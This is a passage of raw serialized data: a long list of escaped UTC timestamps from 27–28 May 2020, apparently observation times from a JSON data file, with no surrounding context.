13:19:07+00:00\",\"2020-05-28 13:43:12+00:00\",\"2020-05-28 13:48:37+00:00\",\"2020-05-27 19:03:26+00:00\",\"2020-05-27 19:09:03+00:00\",\"2020-05-27 19:38:18+00:00\",\"2020-05-27 19:48:59+00:00\",\"2020-05-27 19:53:20+00:00\",\"2020-05-27 19:13:25+00:00\",\"2020-05-27 19:23:15+00:00\",\"2020-05-27 19:28:39+00:00\",\"2020-05-27 19:43:39+00:00\",\"2020-05-27 19:18:49+00:00\",\"2020-05-27 19:34:07+00:00\",\"2020-05-28 16:23:16+00:00\",\"2020-05-28 16:28:21+00:00\",\"2020-05-28 16:38:38+00:00\",\"2020-05-28 16:44:02+00:00\",\"2020-05-28 16:53:22+00:00\",\"2020-05-28 16:03:45+00:00\",\"2020-05-28 16:08:20+00:00\",\"2020-05-28 16:13:39+00:00\",\"2020-05-28 16:19:12+00:00\",\"2020-05-28 16:33:33+00:00\",\"2020-05-28 16:48:10+00:00\",\"2020-05-27 22:08:16+00:00\",\"2020-05-27 22:23:35+00:00\",\"2020-05-27 22:38:15+00:00\",\"2020-05-27 22:28:49+00:00\",\"2020-05-27 22:34:02+00:00\",\"2020-05-27 22:43:42+00:00\",\"2020-05-27 22:48:15+00:00\",\"2020-05-27 22:04:03+00:00\",\"2020-05-27 22:13:18+00:00\",\"2020-05-27 22:18:28+00:00\",\"2020-05-27 22:53:34+00:00\",\"2020-05-28 06:08:14+00:00\",\"2020-05-28 06:13:29+00:00\",\"2020-05-28 06:23:30+00:00\",\"2020-05-28 06:43:32+00:00\",\"2020-05-28 06:19:00+00:00\",\"2020-05-28 06:38:15+00:00\",\"2020-05-28 06:48:54+00:00\",\"2020-05-28 06:04:04+00:00\",\"2020-05-28 06:29:00+00:00\",\"2020-05-28 06:34:05+00:00\",\"2020-05-28 06:53:14+00:00\",\"2020-05-28 04:09:02+00:00\",\"2020-05-28 04:18:17+00:00\",\"2020-05-28 04:28:40+00:00\",\"2020-05-28 04:33:56+00:00\",\"2020-05-28 04:49:12+00:00\",\"2020-05-28 04:13:04+00:00\",\"2020-05-28 04:53:20+00:00\",\"2020-05-28 04:03:51+00:00\",\"2020-05-28 04:23:32+00:00\",\"2020-05-28 04:38:19+00:00\",\"2020-05-28 04:43:37+00:00\",\"2020-05-28 12:24:12+00:00\",\"2020-05-28 12:38:42+00:00\",\"2020-05-28 12:48:31+00:00\",\"2020-05-28 12:08:28+00:00\",\"2020-05-28 12:13:41+00:00\",\"2020-05-28 12:18:53+00:00\",\"2020-05-28 12:03:17+00:00\",\"2020-05-28 12:28:16+00:00\",\"2020-05-28 12:33:26+00:00\",\"2020-05-28 12:43:10+00:00\",\"2020-05-28 12:53:59+00:00\",\"2020-05-28 15:33:26+00:00\",\"2020-05-28 15:38:54+00:00\",\"2020-05-28 15:48:37+00:00\",\"2020-05-28 15:03:56+00:00\",\"2020-05-28 15:23:31+00:00\",\"2020-05-28 15:08:15+00:00\",\"2020-05-28 15:13:41+00:00\",\"2020-05-28 15:18:08+00:00\",\"2020-05-28 15:29:00+00:00\",\"2020-05-28 15:43:11+00:00\",\"2020-05-28 15:54:07+00:00\",\"2020-05-28 02:28:27+00:00\",\"2020-05-28 02:33:36+00:00\",\"2020-05-28 02:03:47+00:00\",\"2020-05-28 02:14:04+00:00\",\"2020-05-28 02:18:17+00:00\",\"2020-05-28 02:49:14+00:00\",\"2020-05-28 02:08:55+00:00\",\"2020-05-28 02:23:22+00:00\",\"2020-05-28 02:38:51+00:00\",\"2020-05-28 02:44:02+00:00\",\"2020-05-28 02:53:20+00:00\",\"2020-05-27 20:04:07+00:00\",\"2020-05-27 20:08:23+00:00\",\"2020-05-27 20:13:40+00:00\",\"2020-05-27 20:18:44+00:00\",\"2020-05-27 20:24:02+00:00\",\"2020-05-27 20:33:16+00:00\",\"2020-05-27 20:29:07+00:00\",\"2020-05-27 20:38:27+00:00\",\"2020-05-27 20:43:34+00:00\",\"2020-05-27 20:48:41+00:00\",\"2020-05-27 20:53:55+00:00\",\"2020-05-28 00:08:33+00:00\",\"2020-05-28 00:03:13+00:00\",\"2020-05-28 00:18:15+00:00\",\"2020-05-28 00:23:30+00:00\",\"2020-05-28 00:28:53+00:00\",\"2020-05-28 00:34:05+00:00\",\"2020-05-28 00:43:30+00:00\",\"2020-05-28 00:48:59+00:00\",\"2020-05-28 00:53:14+00:00\",\"2020-05-28 00:13:47+00:00\",\"2020-05-28 00:38:14+00:00\",\"2020-05-28 11:08:34+00:00\",\"2020-05-28 11:13:32+00:00\",\"2020-05-28 11:23:55+00:00\",\"2020-05-28 11:48:47+00:00\",\"2020-05-28 11:54:04+00:00\",\"2020-05-28 11:03:13+00:00\",\"2020-05-28 11:18:44+00:00\",\"2020-05-28 11:29:01+00:00\",\"2020-05-28 11:34:10+00:00\",\"2020-05-28 11:38:26+00:00\",\"2020-05-28 11:43:37+00:00\",\"2020-05-27 21:13:33+00:00\",\"2020-05-27 21:18:44+00:00\",\"2020-05-27 21:43:30+00:00\",\"2020-05-27 21:48:32+00:00\",\"2020-05-27 21:03:14+00:00\",\"2020-05-27 21:29:05+00:00\",\"2020-05-27 21:33:11+00:00\",\"2020-05-27 21:53:40+00:00\",\"2020-05-27 21:08:17+00:00\",\"2020-05-27 21:23:53+00:00\",\"2020-05-27 21:38:16+00:00\",\"2020-05-28 01:28:17+00:00\",\"2020-05-28 01:38:57+00:00\",\"2020-05-28 01:43:06+00:00\",\"2020-05-28 01:53:20+00:00\",\"2020-05-28 01:03:09+00:00\",\"2020-05-28 01:08:39+00:00\",\"2020-05-28 01:14:05+00:00\",\"2020-05-28 01:33:34+00:00\",\"2020-05-28 01:18:32+00:00\",\"2020-05-28 01:23:52+00:00\",\"2020-05-28 01:48:16+00:00\",\"2020-05-28 10:03:32+00:00\",\"2020-05-28 10:08:39+00:00\",\"2020-05-28 10:18:58+00:00\",\"2020-05-28 10:28:17+00:00\",\"2020-05-28 10:33:22+00:00\",\"2020-05-28 10:43:39+00:00\",\"2020-05-28 10:48:47+00:00\",\"2020-05-28 10:24:13+00:00\",\"2020-05-28 10:53:59+00:00\",\"2020-05-28 10:13:52+00:00\",\"2020-05-28 10:38:31+00:00\",\"2020-05-28 14:38:53+00:00\",\"2020-05-28 14:03:54+00:00\",\"2020-05-28 14:23:31+00:00\",\"2020-05-28 14:33:21+00:00\",\"2020-05-28 14:08:19+00:00\",\"2020-05-28 14:13:54+00:00\",\"2020-05-28 14:18:08+00:00\",\"2020-05-28 14:28:58+00:00\",\"2020-05-28 14:43:18+00:00\",\"2020-05-28 14:48:42+00:00\",\"2020-05-28 14:54:03+00:00\",\"2020-05-28 17:08:15+00:00\",\"2020-05-28 17:23:27+00:00\",\"2020-05-28 17:33:20+00:00\",\"2020-05-28 17:19:17+00:00\",\"2020-05-28 17:04:04+00:00\",\"2020-05-28 17:13:34+00:00\",\"2020-05-28 17:28:57+00:00\",\"2020-05-28 07:08:24+00:00\",\"2020-05-28 07:18:19+00:00\",\"2020-05-28 07:33:36+00:00\",\"2020-05-28 07:13:51+00:00\",\"2020-05-28 07:23:45+00:00\",\"2020-05-28 07:28:19+00:00\",\"2020-05-28 07:38:51+00:00\",\"2020-05-28 07:44:12+00:00\",\"2020-05-28 07:04:03+00:00\",\"2020-05-28 07:48:29+00:00\",\"2020-05-28 07:53:40+00:00\",\"2020-05-27 18:03:27+00:00\",\"2020-05-27 18:53:40+00:00\",\"2020-05-27 18:34:12+00:00\",\"2020-05-27 18:08:58+00:00\",\"2020-05-27 18:13:18+00:00\",\"2020-05-27 18:18:48+00:00\",\"2020-05-27 18:23:08+00:00\",\"2020-05-27 18:28:37+00:00\",\"2020-05-27 18:38:24+00:00\",\"2020-05-27 18:43:44+00:00\",\"2020-05-27 18:48:16+00:00\",\"2020-05-27 23:13:12+00:00\",\"2020-05-27 23:33:16+00:00\",\"2020-05-27 23:48:12+00:00\",\"2020-05-27 23:03:26+00:00\",\"2020-05-27 23:18:23+00:00\",\"2020-05-27 23:38:26+00:00\",\"2020-05-27 23:53:33+00:00\",\"2020-05-27 23:08:52+00:00\",\"2020-05-27 23:23:53+00:00\",\"2020-05-27 23:29:06+00:00\",\"2020-05-27 23:43:43+00:00\",\"2020-05-28 03:19:07+00:00\",\"2020-05-28 03:38:50+00:00\",\"2020-05-28 03:53:16+00:00\",\"2020-05-28 03:03:32+00:00\",\"2020-05-28 03:23:17+00:00\",\"2020-05-28 03:28:22+00:00\",\"2020-05-28 03:43:54+00:00\",\"2020-05-28 03:08:45+00:00\",\"2020-05-28 03:13:58+00:00\",\"2020-05-28 03:33:33+00:00\",\"2020-05-28 03:49:02+00:00\",\"2020-05-28 09:13:53+00:00\",\"2020-05-28 09:28:33+00:00\",\"2020-05-28 09:53:17+00:00\",\"2020-05-28 08:59:04+00:00\",\"2020-05-28 09:03:34+00:00\",\"2020-05-28 09:23:25+00:00\",\"2020-05-28 09:43:58+00:00\",\"2020-05-28 09:08:46+00:00\",\"2020-05-28 09:19:09+00:00\",\"2020-05-28 09:33:37+00:00\",\"2020-05-28 09:38:45+00:00\",\"2020-05-28 09:49:10+00:00\",\"2020-05-28 08:03:21+00:00\",\"2020-05-28 08:08:39+00:00\",\"2020-05-28 08:23:35+00:00\",\"2020-05-28 08:53:47+00:00\",\"2020-05-28 08:28:39+00:00\",\"2020-05-28 08:39:04+00:00\",\"2020-05-28 08:48:25+00:00\",\"2020-05-28 08:14:02+00:00\",\"2020-05-28 08:18:24+00:00\",\"2020-05-28 08:33:55+00:00\",\"2020-05-28 08:43:22+00:00\",\"2020-05-27 18:11:03+00:00\",\"2020-05-27 19:15:04+00:00\",\"2020-05-27 20:23:10+00:00\",\"2020-05-27 21:21:47+00:00\",\"2020-05-27 22:18:53+00:00\",\"2020-05-27 23:20:35+00:00\",\"2020-05-28 00:26:02+00:00\",\"2020-05-28 01:19:24+00:00\",\"2020-05-28 02:17:21+00:00\",\"2020-05-28 03:16:50+00:00\",\"2020-05-28 04:16:14+00:00\",\"2020-05-28 05:11:39+00:00\",\"2020-05-28 06:14:29+00:00\",\"2020-05-28 07:30:27+00:00\",\"2020-05-28 08:09:56+00:00\",\"2020-05-28 09:26:40+00:00\",\"2020-05-28 10:10:19+00:00\",\"2020-05-28 11:18:40+00:00\",\"2020-05-28 12:15:31+00:00\",\"2020-05-28 13:10:14+00:00\",\"2020-05-28 15:23:10+00:00\",\"2020-05-28 16:24:00+00:00\",\"2020-05-28 17:20:41+00:00\",\"2020-05-27 18:23:53+00:00\",\"2020-05-27 19:12:38+00:00\",\"2020-05-27 20:20:19+00:00\",\"2020-05-27 21:11:55+00:00\",\"2020-05-27 22:22:37+00:00\",\"2020-05-27 23:22:31+00:00\",\"2020-05-28 00:20:57+00:00\",\"2020-05-28 01:21:09+00:00\",\"2020-05-28 02:21:54+00:00\",\"2020-05-28 03:18:03+00:00\",\"2020-05-28 04:15:36+00:00\",\"2020-05-28 05:16:29+00:00\",\"2020-05-28 06:13:32+00:00\",\"2020-05-28 07:24:16+00:00\",\"2020-05-28 08:11:56+00:00\",\"2020-05-28 09:21:30+00:00\",\"2020-05-28 10:22:18+00:00\",\"2020-05-28 11:14:30+00:00\",\"2020-05-28 12:22:47+00:00\",\"2020-05-28 13:16:30+00:00\",\"2020-05-28 14:13:17+00:00\",\"2020-05-28 15:29:17+00:00\",\"2020-05-28 16:14:33+00:00\",\"2020-05-28 17:21:53+00:00\",\"2020-05-27 18:10:44+00:00\",\"2020-05-27 19:11:57+00:00\",\"2020-05-27 20:15:56+00:00\",\"2020-05-27 21:15:45+00:00\",\"2020-05-27 22:26:42+00:00\",\"2020-05-27 23:14:41+00:00\",\"2020-05-28 00:21:22+00:00\",\"2020-05-28 01:09:09+00:00\",\"2020-05-28 02:12:44+00:00\",\"2020-05-28 03:19:35+00:00\",\"2020-05-28 04:25:11+00:00\",\"2020-05-28 05:23:07+00:00\",\"2020-05-28 06:18:13+00:00\",\"2020-05-28 07:22:28+00:00\",\"2020-05-28 09:19:29+00:00\",\"2020-05-28 10:15:23+00:00\",\"2020-05-28 12:14:51+00:00\",\"2020-05-28 13:10:32+00:00\",\"2020-05-28 14:17:18+00:00\",\"2020-05-28 15:14:17+00:00\",\"2020-05-28 16:17:00+00:00\",\"2020-05-28 17:22:43+00:00\",\"2020-05-28 04:07:09+00:00\",\"2020-05-27 18:01:53+00:00\",\"2020-05-27 18:16:55+00:00\",\"2020-05-27 17:56:57+00:00\",\"2020-05-27 18:21:56+00:00\",\"2020-05-27 18:06:53+00:00\",\"2020-05-27 18:11:54+00:00\",\"2020-05-28 12:46:28+00:00\",\"2020-05-28 13:16:33+00:00\",\"2020-05-28 12:31:28+00:00\",\"2020-05-28 12:36:28+00:00\",\"2020-05-28 13:06:29+00:00\",\"2020-05-28 13:11:30+00:00\",\"2020-05-28 12:41:30+00:00\",\"2020-05-28 12:51:29+00:00\",\"2020-05-28 12:56:31+00:00\",\"2020-05-28 13:01:32+00:00\",\"2020-05-28 13:21:30+00:00\",\"2020-05-27 19:51:57+00:00\",\"2020-05-27 20:06:57+00:00\",\"2020-05-27 20:11:58+00:00\",\"2020-05-27 20:16:57+00:00\",\"2020-05-27 20:21:57+00:00\",\"2020-05-27 19:31:57+00:00\",\"2020-05-27 19:56:58+00:00\",\"2020-05-27 20:01:57+00:00\",\"2020-05-27 19:36:56+00:00\",\"2020-05-27 19:41:56+00:00\",\"2020-05-27 19:46:56+00:00\",\"2020-05-27 18:36:54+00:00\",\"2020-05-27 18:41:57+00:00\",\"2020-05-27 18:46:58+00:00\",\"2020-05-27 18:51:56+00:00\",\"2020-05-27 19:16:57+00:00\",\"2020-05-27 19:21:55+00:00\",\"2020-05-27 18:31:54+00:00\",\"2020-05-27 19:01:54+00:00\",\"2020-05-27 19:06:57+00:00\",\"2020-05-27 19:11:55+00:00\",\"2020-05-27 18:56:54+00:00\",\"2020-05-28 01:32:05+00:00\",\"2020-05-28 01:42:05+00:00\",\"2020-05-28 02:02:07+00:00\",\"2020-05-28 02:12:09+00:00\",\"2020-05-28 02:22:06+00:00\",\"2020-05-28 01:37:07+00:00\",\"2020-05-28 01:47:10+00:00\",\"2020-05-28 01:52:07+00:00\",\"2020-05-28 01:57:06+00:00\",\"2020-05-28 02:07:06+00:00\",\"2020-05-28 02:17:09+00:00\",\"2020-05-28 16:36:48+00:00\",\"2020-05-28 16:51:39+00:00\",\"2020-05-28 17:16:37+00:00\",\"2020-05-28 16:41:37+00:00\",\"2020-05-28 16:46:36+00:00\",\"2020-05-28 16:56:40+00:00\",\"2020-05-28 17:01:36+00:00\",\"2020-05-28 17:11:38+00:00\",\"2020-05-28 16:31:36+00:00\",\"2020-05-28 17:06:38+00:00\",\"2020-05-28 17:21:37+00:00\",\"2020-05-28 16:16:38+00:00\",\"2020-05-28 16:21:39+00:00\",\"2020-05-28 15:31:34+00:00\",\"2020-05-28 15:41:36+00:00\",\"2020-05-28 15:51:34+00:00\",\"2020-05-28 15:56:38+00:00\",\"2020-05-28 15:36:35+00:00\",\"2020-05-28 15:46:35+00:00\",\"2020-05-28 16:01:34+00:00\",\"2020-05-28 16:06:36+00:00\",\"2020-05-28 16:11:37+00:00\",\"2020-05-27 22:42:02+00:00\",\"2020-05-27 22:52:01+00:00\",\"2020-05-27 22:37:02+00:00\",\"2020-05-27 22:57:04+00:00\",\"2020-05-27 23:07:02+00:00\",\"2020-05-27 23:12:01+00:00\",\"2020-05-27 23:17:03+00:00\",\"2020-05-27 23:22:02+00:00\",\"2020-05-27 22:32:03+00:00\",\"2020-05-27 22:47:02+00:00\",\"2020-05-27 23:02:01+00:00\",\"2020-05-28 00:37:04+00:00\",\"2020-05-28 00:52:06+00:00\",\"2020-05-28 01:02:04+00:00\",\"2020-05-28 01:07:05+00:00\",\"2020-05-28 01:12:05+00:00\",\"2020-05-28 01:22:06+00:00\",\"2020-05-28 00:32:09+00:00\",\"2020-05-28 00:42:04+00:00\",\"2020-05-28 00:47:04+00:00\",\"2020-05-28 00:57:06+00:00\",\"2020-05-28 01:17:05+00:00\",\"2020-05-28 11:31:27+00:00\",\"2020-05-28 11:51:27+00:00\",\"2020-05-28 12:11:34+00:00\",\"2020-05-28 12:21:26+00:00\",\"2020-05-28 11:56:25+00:00\",\"2020-05-28 11:36:25+00:00\",\"2020-05-28 11:41:25+00:00\",\"2020-05-28 11:46:27+00:00\",\"2020-05-28 12:01:26+00:00\",\"2020-05-28 12:06:25+00:00\",\"2020-05-28 12:16:27+00:00\",\"2020-05-27 21:42:00+00:00\",\"2020-05-27 21:47:00+00:00\",\"2020-05-27 21:52:01+00:00\",\"2020-05-27 21:56:59+00:00\",\"2020-05-27 22:12:03+00:00\",\"2020-05-27 22:17:01+00:00\",\"2020-05-27 21:31:59+00:00\",\"2020-05-27 21:37:00+00:00\",\"2020-05-27 22:02:01+00:00\",\"2020-05-27 22:07:00+00:00\",\"2020-05-27 22:22:00+00:00\",\"2020-05-28 07:57:18+00:00\",\"2020-05-28 08:02:21+00:00\",\"2020-05-28 08:11:21+00:00\",\"2020-05-28 07:52:19+00:00\",\"2020-05-28 07:32:17+00:00\",\"2020-05-28 07:37:17+00:00\",\"2020-05-28 07:42:21+00:00\",\"2020-05-28 07:47:19+00:00\",\"2020-05-28 08:07:20+00:00\",\"2020-05-28 08:16:21+00:00\",\"2020-05-28 08:21:19+00:00\",\"2020-05-28 05:32:13+00:00\",\"2020-05-28 05:37:13+00:00\",\"2020-05-28 05:52:15+00:00\",\"2020-05-28 05:57:14+00:00\",\"2020-05-28 06:17:14+00:00\",\"2020-05-28 05:42:15+00:00\",\"2020-05-28 05:47:17+00:00\",\"2020-05-28 06:02:17+00:00\",\"2020-05-28 06:07:16+00:00\",\"2020-05-28 06:12:15+00:00\",\"2020-05-28 06:22:17+00:00\",\"2020-05-28 10:36:24+00:00\",\"2020-05-28 10:41:23+00:00\",\"2020-05-28 10:51:24+00:00\",\"2020-05-28 10:56:24+00:00\",\"2020-05-28 11:16:24+00:00\",\"2020-05-28 10:31:24+00:00\",\"2020-05-28 10:46:24+00:00\",\"2020-05-28 11:01:26+00:00\",\"2020-05-28 11:06:24+00:00\",\"2020-05-28 11:11:24+00:00\",\"2020-05-28 11:21:24+00:00\",\"2020-05-28 08:36:19+00:00\",\"2020-05-28 08:56:20+00:00\",\"2020-05-28 09:11:20+00:00\",\"2020-05-28 08:31:19+00:00\",\"2020-05-28 08:46:19+00:00\",\"2020-05-28 09:01:21+00:00\",\"2020-05-28 09:06:23+00:00\",\"2020-05-28 09:16:22+00:00\",\"2020-05-28 08:41:19+00:00\",\"2020-05-28 08:51:20+00:00\",\"2020-05-28 09:21:22+00:00\",\"2020-05-28 17:36:39+00:00\",\"2020-05-28 17:31:37+00:00\",\"2020-05-28 13:36:34+00:00\",\"2020-05-28 13:41:30+00:00\",\"2020-05-28 13:51:32+00:00\",\"2020-05-28 14:01:31+00:00\",\"2020-05-28 14:16:32+00:00\",\"2020-05-28 14:21:32+00:00\",\"2020-05-28 13:46:30+00:00\",\"2020-05-28 13:56:31+00:00\",\"2020-05-28 13:31:29+00:00\",\"2020-05-28 14:06:32+00:00\",\"2020-05-28 14:11:34+00:00\",\"2020-05-28 06:37:16+00:00\",\"2020-05-28 06:47:15+00:00\",\"2020-05-28 06:52:18+00:00\",\"2020-05-28 06:32:15+00:00\",\"2020-05-28 06:42:15+00:00\",\"2020-05-28 06:57:18+00:00\",\"2020-05-28 07:02:16+00:00\",\"2020-05-28 07:12:22+00:00\",\"2020-05-28 07:17:16+00:00\",\"2020-05-28 07:07:16+00:00\",\"2020-05-28 07:22:17+00:00\",\"2020-05-28 04:32:14+00:00\",\"2020-05-28 04:47:11+00:00\",\"2020-05-28 04:52:12+00:00\",\"2020-05-28 05:02:12+00:00\",\"2020-05-28 05:07:14+00:00\",\"2020-05-28 04:37:12+00:00\",\"2020-05-28 05:12:17+00:00\",\"2020-05-28 05:22:15+00:00\",\"2020-05-28 04:42:13+00:00\",\"2020-05-28 04:57:14+00:00\",\"2020-05-28 05:17:15+00:00\",\"2020-05-27 20:37:00+00:00\",\"2020-05-27 20:51:58+00:00\",\"2020-05-27 21:01:59+00:00\",\"2020-05-27 21:12:00+00:00\",\"2020-05-27 21:22:00+00:00\",\"2020-05-27 20:31:57+00:00\",\"2020-05-27 20:42:02+00:00\",\"2020-05-27 20:57:08+00:00\",\"2020-05-27 21:17:00+00:00\",\"2020-05-27 20:47:00+00:00\",\"2020-05-27 21:06:58+00:00\",\"2020-05-28 09:36:24+00:00\",\"2020-05-28 10:01:23+00:00\",\"2020-05-28 10:06:22+00:00\",\"2020-05-28 10:16:25+00:00\",\"2020-05-28 09:41:23+00:00\",\"2020-05-28 09:51:24+00:00\",\"2020-05-28 09:56:25+00:00\",\"2020-05-28 10:21:23+00:00\",\"2020-05-28 09:31:25+00:00\",\"2020-05-28 09:46:23+00:00\",\"2020-05-28 10:11:23+00:00\",\"2020-05-28 03:42:09+00:00\",\"2020-05-28 03:52:10+00:00\",\"2020-05-28 03:57:11+00:00\",\"2020-05-28 04:12:11+00:00\",\"2020-05-28 04:17:12+00:00\",\"2020-05-28 03:47:11+00:00\",\"2020-05-28 04:02:10+00:00\",\"2020-05-28 04:22:12+00:00\",\"2020-05-28 03:32:09+00:00\",\"2020-05-28 03:37:13+00:00\",\"2020-05-28 02:32:08+00:00\",\"2020-05-28 02:37:09+00:00\",\"2020-05-28 02:47:07+00:00\",\"2020-05-28 02:52:20+00:00\",\"2020-05-28 03:07:08+00:00\",\"2020-05-28 03:12:09+00:00\",\"2020-05-28 03:22:10+00:00\",\"2020-05-28 02:42:11+00:00\",\"2020-05-28 02:57:07+00:00\",\"2020-05-28 03:02:08+00:00\",\"2020-05-28 03:17:08+00:00\",\"2020-05-28 14:46:35+00:00\",\"2020-05-28 14:51:33+00:00\",\"2020-05-28 14:56:35+00:00\",\"2020-05-28 15:01:32+00:00\",\"2020-05-28 14:31:32+00:00\",\"2020-05-28 15:06:39+00:00\",\"2020-05-28 15:11:37+00:00\",\"2020-05-28 15:16:33+00:00\",\"2020-05-28 14:36:32+00:00\",\"2020-05-28 14:41:32+00:00\",\"2020-05-28 15:21:34+00:00\",\"2020-05-27 23:37:03+00:00\",\"2020-05-28 00:07:07+00:00\",\"2020-05-28 00:12:03+00:00\",\"2020-05-28 00:17:05+00:00\",\"2020-05-27 23:42:02+00:00\",\"2020-05-27 23:47:02+00:00\",\"2020-05-27 23:52:03+00:00\",\"2020-05-28 00:22:09+00:00\",\"2020-05-27 23:32:03+00:00\",\"2020-05-27 23:57:03+00:00\",\"2020-05-28 00:02:07+00:00\",\"2020-05-28 00:03:13+00:00\",\"2020-05-28 00:08:31+00:00\",\"2020-05-28 00:53:14+00:00\",\"2020-05-28 00:23:23+00:00\",\"2020-05-28 00:38:11+00:00\",\"2020-05-28 00:43:26+00:00\",\"2020-05-28 00:13:46+00:00\",\"2020-05-28 00:18:14+00:00\",\"2020-05-28 00:28:51+00:00\",\"2020-05-28 00:34:03+00:00\",\"2020-05-28 00:48:53+00:00\",\"2020-05-27 19:13:16+00:00\",\"2020-05-27 19:28:33+00:00\",\"2020-05-27 19:43:36+00:00\",\"2020-05-27 19:03:24+00:00\",\"2020-05-27 19:18:44+00:00\",\"2020-05-27 19:38:13+00:00\",\"2020-05-27 19:53:14+00:00\",\"2020-05-27 19:08:56+00:00\",\"2020-05-27 19:23:08+00:00\",\"2020-05-27 19:34:06+00:00\",\"2020-05-27 19:48:48+00:00\",\"2020-05-28 03:03:28+00:00\",\"2020-05-28 03:23:17+00:00\",\"2020-05-28 03:28:17+00:00\",\"2020-05-28 03:33:31+00:00\",\"2020-05-28 03:38:37+00:00\",\"2020-05-28 03:54:08+00:00\",\"2020-05-28 03:08:38+00:00\",\"2020-05-28 03:13:48+00:00\",\"2020-05-28 03:43:48+00:00\",\"2020-05-28 03:18:58+00:00\",\"2020-05-28 03:48:56+00:00\",\"2020-05-28 13:03:45+00:00\",\"2020-05-28 13:23:26+00:00\",\"2020-05-28 13:28:54+00:00\",\"2020-05-28 13:48:34+00:00\",\"2020-05-28 13:08:11+00:00\",\"2020-05-28 13:13:36+00:00\",\"2020-05-28 13:19:02+00:00\",\"2020-05-28 13:38:47+00:00\",\"2020-05-28 13:33:18+00:00\",\"2020-05-28 13:43:11+00:00\",\"2020-05-28 13:54:00+00:00\",\"2020-05-28 12:24:04+00:00\",\"2020-05-28 12:28:13+00:00\",\"2020-05-28 12:53:54+00:00\",\"2020-05-28 12:08:24+00:00\",\"2020-05-28 12:13:33+00:00\",\"2020-05-28 12:18:50+00:00\",\"2020-05-28 12:33:25+00:00\",\"2020-05-28 12:38:35+00:00\",\"2020-05-28 12:48:26+00:00\",\"2020-05-28 12:03:13+00:00\",\"2020-05-28 12:44:05+00:00\",\"2020-05-27 22:09:08+00:00\",\"2020-05-27 22:28:42+00:00\",\"2020-05-27 22:43:40+00:00\",\"2020-05-27 22:03:58+00:00\",\"2020-05-27 22:13:15+00:00\",\"2020-05-27 22:18:24+00:00\",\"2020-05-27 22:23:33+00:00\",\"2020-05-27 22:33:54+00:00\",\"2020-05-27 22:38:11+00:00\",\"2020-05-27 22:48:07+00:00\",\"2020-05-27 22:53:29+00:00\",\"2020-05-28 01:33:28+00:00\",\"2020-05-28 01:48:10+00:00\",\"2020-05-28 01:14:02+00:00\",\"2020-05-28 01:23:50+00:00\",\"2020-05-28 01:28:14+00:00\",\"2020-05-28 01:38:48+00:00\",\"2020-05-28 01:04:09+00:00\",\"2020-05-28 01:08:33+00:00\",\"2020-05-28 01:18:22+00:00\",\"2020-05-28 01:44:07+00:00\",\"2020-05-28 01:53:16+00:00\",\"2020-05-28 09:08:42+00:00\",\"2020-05-28 09:13:49+00:00\",\"2020-05-28 09:19:00+00:00\",\"2020-05-28 09:28:22+00:00\",\"2020-05-28 09:33:32+00:00\",\"2020-05-28 09:53:10+00:00\",\"2020-05-28 09:23:12+00:00\",\"2020-05-28 09:43:52+00:00\",\"2020-05-28 09:03:32+00:00\",\"2020-05-28 09:38:44+00:00\",\"2020-05-28 09:49:05+00:00\",\"2020-05-27 21:04:11+00:00\",\"2020-05-27 21:28:57+00:00\",\"2020-05-27 21:48:30+00:00\",\"2020-05-27 21:18:36+00:00\",\"2020-05-27 21:23:48+00:00\",\"2020-05-27 21:38:14+00:00\",\"2020-05-27 21:43:21+00:00\",\"2020-05-27 21:08:15+00:00\",\"2020-05-27 21:13:29+00:00\",\"2020-05-27 21:34:07+00:00\",\"2020-05-27 21:53:39+00:00\",\"2020-05-28 11:13:30+00:00\",\"2020-05-28 11:23:49+00:00\",\"2020-05-28 11:28:56+00:00\",\"2020-05-28 11:43:33+00:00\",\"2020-05-28 11:03:09+00:00\",\"2020-05-28 11:18:40+00:00\",\"2020-05-28 11:38:21+00:00\",\"2020-05-28 11:53:54+00:00\",\"2020-05-28 11:08:24+00:00\",\"2020-05-28 11:34:04+00:00\",\"2020-05-28 11:48:42+00:00\",\"2020-05-28 02:08:48+00:00\",\"2020-05-28 02:28:25+00:00\",\"2020-05-28 02:49:00+00:00\",\"2020-05-28 02:33:35+00:00\",\"2020-05-28 02:38:46+00:00\",\"2020-05-28 02:43:52+00:00\",\"2020-05-28 01:58:28+00:00\",\"2020-05-28 02:03:42+00:00\",\"2020-05-28 02:14:00+00:00\",\"2020-05-28 02:18:17+00:00\",\"2020-05-28 02:23:14+00:00\",\"2020-05-28 02:53:09+00:00\",\"2020-05-27 23:38:22+00:00\",\"2020-05-27 23:03:22+00:00\",\"2020-05-27 23:08:48+00:00\",\"2020-05-27 23:13:12+00:00\",\"2020-05-27 23:33:11+00:00\",\"2020-05-27 23:43:44+00:00\",\"2020-05-27 23:53:29+00:00\",\"2020-05-27 23:18:17+00:00\",\"2020-05-27 23:23:45+00:00\",\"2020-05-27 23:29:00+00:00\",\"2020-05-27 23:49:07+00:00\",\"2020-05-27 18:03:26+00:00\",\"2020-05-27 18:08:53+00:00\",\"2020-05-27 18:13:23+00:00\",\"2020-05-27 18:18:47+00:00\",\"2020-05-27 18:23:14+00:00\",\"2020-05-27 18:38:19+00:00\",\"2020-05-27 18:48:15+00:00\",\"2020-05-27 18:53:38+00:00\",\"2020-05-27 18:43:43+00:00\",\"2020-05-27 18:28:32+00:00\",\"2020-05-27 18:33:58+00:00\",\"2020-05-28 06:03:58+00:00\",\"2020-05-28 06:28:47+00:00\",\"2020-05-28 06:33:55+00:00\",\"2020-05-28 06:43:37+00:00\",\"2020-05-28 06:53:07+00:00\",\"2020-05-28 06:08:07+00:00\",\"2020-05-28 06:18:58+00:00\",\"2020-05-28 06:38:10+00:00\",\"2020-05-28 06:13:27+00:00\",\"2020-05-28 06:23:26+00:00\",\"2020-05-28 06:48:47+00:00\",\"2020-05-28 14:03:50+00:00\",\"2020-05-28 14:13:39+00:00\",\"2020-05-28 14:48:34+00:00\",\"2020-05-28 14:19:04+00:00\",\"2020-05-28 14:23:28+00:00\",\"2020-05-28 14:28:54+00:00\",\"2020-05-28 14:33:18+00:00\",\"2020-05-28 14:54:03+00:00\",\"2020-05-28 14:08:13+00:00\",\"2020-05-28 14:38:46+00:00\",\"2020-05-28 14:43:12+00:00\",\"2020-05-28 04:08:55+00:00\",\"2020-05-28 04:14:08+00:00\",\"2020-05-28 04:18:09+00:00\",\"2020-05-28 04:23:22+00:00\",\"2020-05-28 04:28:42+00:00\",\"2020-05-28 04:53:17+00:00\",\"2020-05-28 04:03:46+00:00\",\"2020-05-28 04:33:51+00:00\",\"2020-05-28 04:38:14+00:00\",\"2020-05-28 04:43:35+00:00\",\"2020-05-28 04:48:56+00:00\",\"2020-05-28 15:08:14+00:00\",\"2020-05-28 